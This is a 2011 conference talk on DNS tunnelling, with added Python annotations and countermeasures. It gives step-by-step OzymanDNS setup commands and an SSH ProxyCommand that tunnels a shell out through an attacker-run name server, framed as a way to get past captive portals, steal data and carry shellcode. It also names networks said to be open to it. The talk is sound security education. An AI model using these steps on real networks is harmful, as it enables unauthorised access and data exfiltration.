DNS Tunnelling: it's all in the name
BSidesLondon 20Th April 2011 - Arron "finux" Finnon
The presentation's aim is to show how simple it is to deploy DNS tunnelling infrastructure at little or no cost. It also shows how to establish an SSH connection from target to attacker over the tunnel, and acts as a taster for people's further research.
----- for more about @F1nux go to www.finux.co.uk


  1. DNS Tunnelling, it's all in the name!
     Arron "finux" Finnon
     finux@finux.co.uk
     http://www.finux.co.uk
  2. Okay, DNS tunnelling sounds a little complicated. You won't need a hard hat, a shovel or a drill, but you will need a shell account on a system which allows you control over port 53, that is, a host where you can bind UDP port 53 and that a public NS record can be pointed at.
  3. However, it is very likely that it is illegal unless it is done in your own test environment.
  4. So who am I, and why am I here?
     I ask the question every morning. I still haven't answered it, but I may be able to answer it for you.
     My name is Arron, I have been involved in ethical hacking for a number of years. I'm currently at the University of Abertay Dundee as a student. I have spent some time as a security consultant and independent researcher. I have a reputation as being a little bit of a media/attention whore. I agree with that statement, so much so that I have a weekly podcast talking about geeky things: Finux Tech Weekly. I have over the years given a number of talks on a range of things related to hacking and security.
  5. So where can you find me?
     Email - finux@finux.co.uk
     Twitter - www.twitter.com/f1nux & www.twitter.com/finuxtechweekly
     Facebook - www.facebook.com/finux
     Podcast Site - www.finux.co.uk
     Skype - finux1
  6. Talk Outline
     The History Involved
     Technical Overview
     Tools Available
     Those that "Bob" told me are affected
     A short how-to on one set-up/configuration option
     Other potential uses for DNS Tunnelling
     Countermeasures
     Links
     Q&A
  7. Disclaimer
     Without doubt the legal implications of using the discussed techniques are immense. If you use this to obtain "Free Internet", I would point out that if you go to JAIL it's not very free, and of course it could quite possibly cost you a career too.
     If you have any doubt about the legalities of what you are doing then STOP it.
     If you do use this to break the law, and you do get caught, you're totally on your own; this is for educational purposes only. Feel free to let me know though, it will make a great anecdote and I'm happy to write to you during your stay.
     However, as usual, to defend we must know how to attack.
     "The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable." - Sun Tzu
     Not if the hacker comes, but when they come...
  8. Intended Audience
     Here's the shock: hackers! However, I mean the playful advocates of technology when I use that term; I tend not to buy into the media definition of it. What I mean by hacker is "playful advocates of technology". If technical things excite you, then this is for you.
     I love security, I love hacking, I love taking things apart, and I believe it's a prerequisite for our trade.
     As a good friend of mine, who is now the chief of operations for First Base, a long-haired geek that goes by the name of Pete Wood, puts it: if you weren't electrocuted by the age of 10 this might not be the trade for you. I'm proud to say I was shocked by 6, and I'll hazard a guess I'm not the only one in this room.
  9. A Small Intro
     In September 2000 a post came across the Slashdot website informing its readers of an interesting use of DNS tunnelling for breaking out of locked-down networks. It exploits the fact that most networks, regardless of their firewall or access control lists, will allow DNS look-ups. Researchers found that with crafted packets they could in fact establish bi-directional IP traffic, and they delivered a protocol named NSTX.
     However, this concept became more widely established when the respected DNS security researcher Dan Kaminsky released his OzymanDNS tool at Black Hat in 2004 (the release is linked at the end). Kaminsky, who in 2010 became one of ICANN's Trusted Community Representatives for the DNSSEC root key, has an unparalleled reputation when it comes to DNS security and its insecurities. Needless to say this release caught the attention of many security researchers; however, worryingly, nearly 11 years after the discovery and almost seven years since the OzymanDNS release, this weakness still lives on in a number of networks.
     Although DNS tunnelling could be seen as a way to obtain free Internet on captive portals, it is also an effective tool for data theft. It is hard to imagine the limitations when this is mixed with shellcode: DNS tunnelling could be used to reverse-connect a shellcode from target to attacker, and the tunnel's effectiveness at traversing NAT makes it a worthy deployment.
  10. Some History
     In 1987 the domain name protocol basically came into life; it was defined in RFC 1035 (together with RFC 1034), which superseded RFCs 882, 883 and 973.
     Around 13 years later a group of hackers started playing around with the concept of DNS tunnelling, mainly to get free Internet over Microsoft's PPP dial-ins for updates. Most of these Microsoft PPP dial-ins allowed you to use a name server. These hackers later developed the "NSTX protocol", meaning "Name Server Transfer Protocol", and in doing so finally managed to tunnel their net connection over one of Microsoft's toll-free numbers in Germany.
     Iodine later became popular due to its password authentication; however it was still very similar to NSTX.
     As I have said, I think it is fair to say that the concept grabbed more attention when the respected breaker of DNS Dan Kaminsky released a set of scripts at Black Hat in 2004 which were written in Perl and in reality very easy to deploy. For the purposes of today's talk I will focus on OzymanDNS.
  11. Technical Overview
     We could take this from the standpoint of a captive portal, which normally intercepts all web traffic until some sort of authentication is achieved. However, we regularly see that they still allow DNS queries out. One way to check this on a captive portal is to use dig (or nslookup if you're running Windows) against an external name: if you are handed a private address then you're out of luck, the portal is answering everything itself; if you receive the real public IP address of the domain in question then DNS requests are being resolved externally.
     If we revisit how the Domain Name System is set up: the 13 root name servers serve the root zone and delegate each Top Level Domain (TLD) such as .com or .org to the TLD's own servers. Those in turn delegate a domain such as example.com to the name servers its owner runs, and the owner can delegate sub-domains such as test.example.com to yet another server. Each zone is configured in a zone file holding a number of records: an A record (an address record), a CNAME (an alias for another name), an MX record for handling mail, an NS record that delegates a sub-domain to another DNS server, and a TXT record that carries free-form text. It is the last two record types that interest us.
  12. Technical Overview
     A domain name can be at most 255 octets long on the wire, and each label within it at most 63 octets. A single TXT character string can also be only 255 bytes, although one TXT record may carry several such strings (the response shown later has two).
     So it lies within a 255-byte domain name that we can carry a payload of data out, and within the 255-byte strings of a TXT record that a payload can be delivered back. If we encode our outbound data into a formatted domain name of up to 255 bytes and have that decoded at our fake name server, and our fake name server encodes its response and delivers it via a TXT record, we now see a very plausible avenue for transmitting data.
  13. Technical Overview
     So what we need is a fake domain name server listening on port 53 which will respond to requests, and a hostname which is in fact a delegated NS record pointing at that fake DNS server. An example would be inbound.example.com delegated to server.inbound.example.com. The zone file for example.com could contain:

        inbound.example.com.         IN NS  server.inbound.example.com.
        server.inbound.example.com.  IN A   <address of the fake name server>

     The A record (a glue record, since the name server sits inside the zone it serves) points to our fake domain name server, and our client makes all its requests under the inbound sub-domain; whatever resolver the client is forced to use will end up forwarding them to our server. Of course, if you were using DynDNS.org it could be as simple as:

        inbound.example.com.  IN NS  finux.dyndns.org.
  14. Technical Overview
     A free account at DynDNS.org does not allow you to delegate name servers. However, freedns.afraid.org does. I happen to prefer the update client(s) on DynDNS, so I personally go for a freedns.afraid.org sub-domain and point it at a DynDNS account. Personally I think this makes the set-up a little easier, and gives it an edge of portability.
     All DNS tunnelling set-ups rely in some way on a delegated name server. I admit I'm a Linux jock and so this configuration is based on my experience with Linux; there are links on how to do this on a Windows set-up at the end. My advice would be to build a virtual machine running Ubuntu/Debian, which will make deployment in your test environment pretty easy.
  15. Technical Overview
     As I have said, for today's purposes we'll be looking at Kaminsky's OzymanDNS tool, in fact a revised version of it. OzymanDNS is broken down into four Perl scripts. The server script is named nomde.pl; it listens on a privileged port (UDP 53) and so requires sufficient permissions to do so:

        sudo ./nomde.pl -i inbound.example.com

     The above command sets the OzymanDNS server to listen to all requests for the sub-domain inbound.example.com.
  16. Technical Overview
     The OzymanDNS client is written to encode/decode and pass the data through STDIN/STDOUT, which isn't overly useful on its own. Combined with the SSH config option ProxyCommand, however, it gives the ease of use this set of scripts has become renowned for:

        ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com" user@localhost

     The upstream data is sent out Base32-encoded in the labels of the query name (domain names are case-insensitive, so Base64 cannot be used here). After the data labels come a sequence counter and a unique session ID (63026-0 and id-32227 in the example): DNS over UDP gives no ordering or delivery guarantee and some requests take longer than others, so the server needs these to put the chunks back in order and tell sessions apart. Then comes the keyword up or down, indicating whether the traffic is up- or downstream, and finally the delegated sub-domain. An example request could look like this:

        ntez375sy2qk7jsg2og3eswo2jujscb3r43as6m6hl2wsxobm7h2olu4tmaq.
        lyazbf2e2rdynrd3fldvdy2w3tifigy2csrx3cqczxyhnxygor72a7fx47uo.
        nwqy4oa3v5rx66b4aek5krzkdm5btgz6jbiwd57ubnohnknpcuybg7py.
        63026-0.id-32227.up.sshdns.inbound.example.com
  17. Technical Overview
     The response comes back as a DNS TXT record. A TXT record can hold arbitrary ASCII data, upper-case as well as lower-case letters and digits, so the responses can be Base64-encoded (denser than the Base32 used upstream). Note the TTL of 0, so no resolver along the path caches the answer. Such a response might look like this:

        695-8859.id-39201.down.sshdns.inbound.example.com. 0 IN TXT
            "AAAAlAgfAAAAgQDKrd3sFmf8aLX6FdU8ThUy3SRWGhotR6EsAavqHgBzH2khqsQHQjEf355jS7cTG+4a8kAmFVQ4mpEEJeBE6IyDWbAQ9a0rgOKcsaWwJ7GdngGm9jpvReXX7S/2oqAIUFCn0M8="
            "MHw9tR0kkDVZB7RCfCOpjfHrir7yuiCbt7FpyX8AAAABBQAAAAAAAAAA"
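To make the two preceding slides concrete, here is an added example (not part of the talk and not the OzymanDNS scripts themselves) that models the data plane they describe: upstream bytes go out Base32-encoded in the labels of a query name, downstream bytes come back Base64-encoded in the strings of a TXT record. The label layout (data labels, then "<seq>-<chunk>.id-<session>.up.<zone>") copies the request on slide 16; what the two numbers mean exactly is an assumption, as is the zone name.

```python
"""Toy model of the OzymanDNS data plane (added example, not the tool's code)."""
import base64
import random

MAX_LABEL = 63        # RFC 1035: one label is at most 63 octets
MAX_NAME = 253        # 255 octets on the wire is 253 characters in dotted form
MAX_TXT_STRING = 255  # each <character-string> in TXT RDATA is at most 255 octets


def payload_bytes_for(budget: int) -> int:
    """How many raw bytes fit in `budget` characters of dot-separated data labels."""
    if budget < MAX_LABEL + 1:                        # a single short label, no dot needed
        chars = max(budget, 0)
    else:
        full = (budget + 1) // (MAX_LABEL + 1)        # 63-char labels, dot-separated
        left = budget - (full * (MAX_LABEL + 1) - 1)  # room after those labels
        chars = full * MAX_LABEL + max(left - 1, 0)   # one more dot, then a short label
    return chars * 5 // 8                             # unpadded Base32: 8 chars per 5 bytes


def encode_upstream(payload: bytes, seq: int, chunk: int, session: int, zone: str) -> str:
    """Client side: build one query name carrying `payload` towards the fake name server."""
    data = base64.b32encode(payload).decode().rstrip("=").lower()  # names are case-insensitive
    labels = [data[i:i + MAX_LABEL] for i in range(0, len(data), MAX_LABEL)]
    name = ".".join(labels + [f"{seq}-{chunk}", f"id-{session}", "up", zone])
    if len(name) > MAX_NAME:
        raise ValueError(f"{len(name)}-char name exceeds {MAX_NAME}; payload too large")
    return name


def decode_upstream(name: str, zone: str):
    """Server side: recover (payload, seq, chunk, session, direction) from a query name."""
    if not name.lower().endswith("." + zone.lower()):
        raise ValueError("query is not for our delegated zone")
    labels = name[: -len(zone) - 1].split(".")
    seq, chunk = (int(x) for x in labels[-3].split("-"))
    session = int(labels[-2].removeprefix("id-"))
    data = "".join(labels[:-3]).upper()
    data += "=" * (-len(data) % 8)                    # restore the padding we stripped
    return base64.b32decode(data), seq, chunk, session, labels[-1]


def chunk_upstream(payload: bytes, session: int, zone: str, seq: int = 0) -> list[str]:
    """Split a byte stream into as few maximal query names as the 253-char limit allows."""
    names, pos, chunk = [], 0, 0
    while pos < len(payload):
        control = f"{seq}-{chunk}.id-{session}.up.{zone}"
        n = payload_bytes_for(MAX_NAME - len(control) - 1)  # -1 for the joining dot
        names.append(encode_upstream(payload[pos:pos + n], seq, chunk, session, zone))
        pos, chunk = pos + n, chunk + 1
    return names


def reassemble_upstream(names: list[str], zone: str) -> bytes:
    """Put chunks back in order: UDP gives no ordering guarantee, the chunk counter does."""
    parts = [decode_upstream(n, zone) for n in names]
    parts.sort(key=lambda p: p[2])                    # sort on the chunk counter
    return b"".join(p[0] for p in parts)


def encode_downstream(payload: bytes) -> list[str]:
    """Server -> client: Base64 (TXT strings keep case) split into 255-byte strings."""
    data = base64.b64encode(payload).decode()
    return [data[i:i + MAX_TXT_STRING] for i in range(0, len(data), MAX_TXT_STRING)]


def decode_downstream(strings: list[str]) -> bytes:
    """Client side: join the TXT strings and decode."""
    return base64.b64decode("".join(strings))


if __name__ == "__main__":
    zone = "sshdns.inbound.example.com"                # assumed delegated zone
    rng = random.Random(1)
    up = bytes(rng.getrandbits(8) for _ in range(500)) # constructed test data
    queries = chunk_upstream(up, 32227, zone)
    rng.shuffle(queries)                               # simulate reordering in flight
    assert reassemble_upstream(queries, zone) == up
    for q in queries:
        print(len(q), q[:40] + "...")
    txt = encode_downstream(b"SSH-2.0-OpenSSH_5.8p1\r\n" * 20)
    print(len(txt), "TXT strings; longest", max(map(len, txt)), "bytes")
```

Running it shows why the channel is slow: with this zone name each query carries at most 129 bytes upstream, and every byte needs a round trip through whatever resolver the captive portal hands out.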
  18. Technical Overview
     A quick recap of what is needed on our Debian-like system. We need to install some Perl packages:

        sudo apt-get install screen libnet-dns-perl libmime-base32-perl

     In addition you may want to install ddclient as well and configure your dynamic sub-domain to point at the server. You'll also need to set up SSH. You will want to download the OzymanDNS scripts; I have made the latest version available on my site:

        wget http://finux.co.uk/demos/software/OzymanDNS-Splitbrain-Version.tar.gz

     As I have said, this version of OzymanDNS is revised, with the code cleaned up by Andreas Gohr of the Splitbrain.org website: http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple
  19. Technical Overview
     Our client configuration is as follows:

        sudo apt-get install libnet-dns-perl libmime-base32-perl

     And then a simple command:

        ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com" user@localhost
  20. Tools Available
     Iodine, which as I have mentioned is very similar to NSTX, works by creating a virtual network interface on the server and the client; those two virtual interfaces then carry IP traffic between each other over DNS. (Unlike the original NSTX it runs on several platforms, not just Linux.)
     Netcross is a little modular tool that might be useful in restricted network connections.
     DNSCat is basically netcat for DNS.
  21. Those that "Bob" told me are affected
     The Cloud network, such as the ones that cover Wetherspoon pubs and McDonald's
     BT Openzone
     A certain university in north-east Scotland, which will soon be fixed
     Interestingly, over 3G it has been reported that T-Mobile allow unfettered DNS queries. This could in fact be false; however, if it's true then it is really quite scary.
     Eastern Trains
     Remember it's easily tested: an nslookup or a dig should tell you within seconds. Even if ping is blocked, there is a good chance you can use a lookup to determine whether the network is vulnerable, as it will still return an IP address.
  22. Other potential uses of DNS Tunnelling
     As discussed, covert communications over an otherwise restricted channel.
     Data theft: even where you do not allow any SSH, FTP, SFTP and so forth, scp works over the OzymanDNS set-up, since scp runs over ssh and so picks up the same ProxyCommand.
     By far the craziest I have seen is delivering shellcode via DNS tunnels. The interesting aspect of tunnelling shellcode over DNS is that, for starters, it renders any potential NAT issues null and void: the target only ever makes outbound DNS queries, so nothing has to connect back in. There are already a fair few PoCs that demonstrate this concept. I have recently been reading about how some of the Metasploit payloads could be used combined with DNSCat. I have not had time to play anywhere near as much with this as I would have liked to, but needless to say I'm sure I'll get my chance.
  23. Countermeasures
     The best way of detecting DNS tunnelling is by performing statistical anomaly detection on the network. Some characteristics of a DNS tunnel include:
     High volume of DNS requests from internal clients where little usually takes place
     A significant difference in the format of these lookups compared to regular ones, i.e. long Base32- and Base64-looking labels, almost every query name unique, and unusual record types such as TXT
     The total amount of data transferred over port 53 is much higher than usual
     DNS tunnelling could actually be one of the best covert channels ever designed. In general it proves quite challenging to stop this traffic, as there is no single indicator that marks a packet as IP-over-DNS tunnelling. There are, however, a number of ways to mitigate the threat to a certain degree.
  24. Countermeasures
     If you are running a for-a-fee access point, consider having your DNS server answer all queries with a local IP address until payment has been completed. Only afterwards should a client be able to perform DNS lookups that your server resolves on the Internet.
     Many organisations currently do this by having HTTP requests rewritten to a local web server on which payment is due. This however still allows the client to resolve external domains, and as such does not close the covert channel.
     A potential solution is to set up a BIND server which has a local zone for every TLD (IANA publishes the current list). Set up a wildcard entry in each of these zones that points to your local web server which processes payments. Requests for any other domain or zone should not be handled recursively.
     Bear in mind this only helps if the firewall also forces all port 53 traffic through that server: a client that can send UDP 53 directly to the attacker's name server never touches your resolver at all.
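As an added illustration of the walled-garden idea above (this is not configuration from the talk), here is a BIND 9 layout with two views: unpaid clients are served from local copies of every TLD, each carrying a wildcard that lands on the portal, and get no recursion; paid clients fall into a view that recurses normally. The addresses, the ACL contents and the file paths are assumptions.

```conf
// ---- named.conf (added example; addresses and paths are assumed) ----
acl paid { 10.0.0.50; 10.0.0.51; };      // maintained by the payment system (assumed)

view "paid" {
    match-clients { paid; };             // first matching view wins, so this goes first
    recursion yes;                       // real resolution only after payment
};

view "walled" {
    match-clients { any; };
    recursion no;                        // anything we are not authoritative for is REFUSED
    // One zone per TLD from IANA's published list; all share the same wildcard zone file.
    zone "com" { type master; file "/etc/bind/db.walled"; };
    zone "net" { type master; file "/etc/bind/db.walled"; };
    zone "org" { type master; file "/etc/bind/db.walled"; };
    zone "uk"  { type master; file "/etc/bind/db.walled"; };
    // ... and so on for the rest of the TLD list
};

// ---- /etc/bind/db.walled (loaded as every TLD, so every name is relative) ----
$TTL 30
@       IN SOA   ns hostmaster ( 2011042001 3600 600 86400 30 )
        IN NS    ns
ns      IN A     10.0.0.1                ; the portal box
*       IN A     10.0.0.1                ; every name under the TLD lands on the portal
```

The wildcard only synthesises A answers: a TXT query for a tunnel name under .com gets a NODATA answer from this server and never leaves the building, which is the point. Pair it with a firewall rule that blocks outbound UDP/TCP 53 from the client network to anything but 10.0.0.1, otherwise a tunnel client pointed straight at the attacker's server bypasses the whole arrangement.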
  25. Countermeasures
     One solution which is sometimes considered is to deny all queries for TXT records. The impact of this will in most cases be limited, although certain functionality (such as SPF, which is published in TXT records) may break. In general only your incoming mail server will need to perform these lookups; given a general split-DNS service on multiple servers it should be feasible to work around this. There are precious few reasons why the average internal client should be able to look up TXT records.
     This approach is however fairly naive, as tunnelling is still possible through other record types: iodine, for instance, can carry its data in NULL, CNAME, MX, SRV and even A records. You will not be able to disable those, such as CNAME, because of the heavy production impact.
     Remember that blocking a domain name once it exceeds X lookups within a period seems a good idea, until you think about the number of lookups your organisation makes to google.com in an hour. Count distinct query names and label lengths per domain rather than raw volume.
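The following is an added example, not from the talk, that turns the detection characteristics on slide 23 into a first-cut detector while respecting the caveat just made about google.com on slide 25: it scores per-zone statistics (distinct names, name length, Base32-looking labels, TXT/NULL share) instead of raw volume, so a busy but ordinary zone is not flagged while an OzymanDNS-style zone is. The query-log lines are constructed here in a BIND-like layout, the zone key is a crude "last two labels" guess, and the thresholds are assumptions to be tuned on real traffic.

```python
"""First-cut DNS tunnel detector over query-log lines (added example)."""
import base64
import random
import re
from collections import defaultdict

LOG_LINE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")
B32_LABEL = re.compile(r"^[a-z2-7]{20,63}$")  # long label drawn only from the Base32 alphabet


def constructed_log() -> list[str]:
    """Synthetic query log: 40 ordinary lookups plus 12 OzymanDNS-style upstream chunks."""
    rng = random.Random(7)
    lines = []
    for i in range(40):   # busy but ordinary: few distinct, short names
        name = rng.choice(["www.google.com", "mail.google.com", "ssl.gstatic.com",
                           "clients1.google.com"])
        lines.append(f"client 10.0.0.{rng.randint(2, 9)}#{40000 + i}: query: {name} IN A + (10.0.0.1)")
    for i in range(12):   # tunnel: every name unique, long Base32 labels, TXT type
        data = base64.b32encode(rng.randbytes(120)).decode().rstrip("=").lower()
        labels = ".".join(data[j:j + 63] for j in range(0, len(data), 63))
        lines.append(f"client 10.0.0.5#{50000 + i}: query: {labels}.0-{i}.id-32227.up."
                     f"sshdns.inbound.example.com IN TXT + (10.0.0.1)")
    rng.shuffle(lines)
    return lines


def zone_of(qname: str) -> str:
    """Crude registered-domain guess (last two labels); use a public-suffix list in practice."""
    return ".".join(qname.split(".")[-2:])


def zone_stats(lines):
    """Aggregate per-zone counters from log lines; lines that do not parse are skipped."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "name_chars": 0,
                                 "chars": 0, "b32_chars": 0, "odd_types": 0})
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        qname = m["qname"].rstrip(".").lower()
        s = stats[zone_of(qname)]
        s["queries"] += 1
        s["names"].add(qname)
        s["name_chars"] += len(qname)
        for label in qname.split("."):
            s["chars"] += len(label)
            if B32_LABEL.match(label):
                s["b32_chars"] += len(label)
        if m["qtype"] in ("TXT", "NULL"):
            s["odd_types"] += 1
    return stats


def score_zone(s) -> list[str]:
    """Return the human-readable indicators that fire for one zone (thresholds assumed)."""
    reasons = []
    uniq = len(s["names"]) / s["queries"]
    if s["queries"] >= 10 and uniq > 0.8:
        reasons.append(f"{uniq:.0%} of {s['queries']} queries are distinct names")
    mean_len = s["name_chars"] / s["queries"]
    if mean_len > 100:
        reasons.append(f"mean query name length {mean_len:.0f} chars")
    b32 = s["b32_chars"] / s["chars"]
    if b32 > 0.5:
        reasons.append(f"{b32:.0%} of name characters sit in Base32-looking labels")
    odd = s["odd_types"] / s["queries"]
    if odd > 0.5:
        reasons.append(f"{odd:.0%} of queries are TXT/NULL")
    return reasons


def suspicious_zones(lines, min_reasons: int = 2) -> dict:
    """Zones with at least `min_reasons` indicators; a single indicator is too noisy to act on."""
    found = {}
    for zone, s in zone_stats(lines).items():
        reasons = score_zone(s)
        if len(reasons) >= min_reasons:
            found[zone] = reasons
    return found


if __name__ == "__main__":
    for zone, reasons in suspicious_zones(constructed_log()).items():
        print(zone)
        for r in reasons:
            print("   ", r)
```

Requiring two indicators is what keeps google.com quiet: it has the volume but neither the unique-name ratio nor the label shape. Run against real query logs, the same statistics also catch iodine-style tunnels that use NULL or CNAME instead of TXT, since the name-shape indicators do not depend on the record type.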
  26. Conclusions
     In conclusion, I haven't really scratched the surface of what can be done here.
     The reality of it is, if you're not looking at DNS traffic then someone may well be doing so.
     It still has the potential to be one of the best covert channels going and can be very technically difficult to detect.
     The uses for this are really limited only by your imagination.
     If you can use this with 3G technology then this could make somewhat of a lethal weapon.
     However, some forethought about what you could and should expect on your network goes a long way.
     You may think this connection would be slow, but within my links is a paper showing speeds of up to 110 kilobytes a second.
  27. Links
     Slashdot article on NSTX: http://slashdot.org/articles/00/09/10/2230242.shtml
     Kaminsky's Wikipedia page: http://en.wikipedia.org/wiki/Dan_Kaminsky
     Kaminsky's release of the tools he developed: http://dankaminsky.com/2004/07/29/51/
     Kaminsky's Black Hat paper: http://www.doxpara.com/slides/BH_EU_05-Kaminsky.pdf
     Splitbrain's "DNS tunneling made simple" (the cleaned-up OzymanDNS used in this talk): http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple
     Very good guide on setting up DNS tunnels: http://dnstunnel.de/
     IVC wiki article on DNS tunnelling: http://beta.ivc.no/wiki/index.php/DNS_Tunneling
  28. Links
     Another guide to tunnelling over DNS: http://www.h-i-r.net/2010/03/dns-tunneling-part-1-intro-and.html
     PDF paper from Black Hat (Ty Miller, Reverse DNS Tunneling Shellcode): http://www.blackhat.com/presentations/bh-usa-08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdf
     Heyoka paper: http://shakacon.org/talks/Revelli-Leidecker_Heyoka.pdf
     Further guide to configuring OzymanDNS, for Windows-type systems:
        http://cyberphob1a.wordpress.com/2008/02/10/dns-tunneling-part-i/
        http://cyberphob1a.wordpress.com/2008/02/11/speeding-up-dns-tunneling/
        http://cyberphob1a.wordpress.com/2008/03/08/dns-tunneling-updated-source/
     DNS RFC: ftp://ftp.rfc-editor.org/in-notes/rfc1035.txt
  29. Links
     Another TCP-over-DNS implementation, this one in Java instead of Perl: http://analogbit.com/tcp-over-dns_howto
     For presentation side notes, speeding up Firefox for low-bandwidth carriers: http://www.ghacks.net/2008/07/13/optimize-firefox-for-low-traffic-volumes/
     DNScat as a payload with Metasploit: http://www.skullsecurity.org/blog/2010/weaponizing-dnscat-with-shellcode-and-metasploit
     Reverse DNS Tunneling Shellcode (v0.3) technical details: http://projectshellcode.com/?q=node/2
     Tutorial using dns2tcp, written by two people working for HSC, a French security company:
        http://blog.rootshell.be/2007/03/22/dns2tcp-how-to-bypass-firewalls-or-captive-portals/
        http://www.hsc.fr/ressources/outils/dns2tcp/download/
     Traffic analysis approach to detecting DNS tunnels: http://blog.vorant.com/2006/05/traffic-analysis-approach-to-detecting.html
     Tunneling shit over DNS: http://www.modacity.net/forums/showthread.php?19755-Tunneling-shit-over-DNS
  30. Questions & Answers?
  31. Thank You For Your Time
     I hope it has been of interest. Please feel free to come grab me later for a chat. Don't forget to listen to the show: www.finux.co.uk
     On a side note, I have never been on a night out in London. So I'll apologise for tonight tomorrow morning.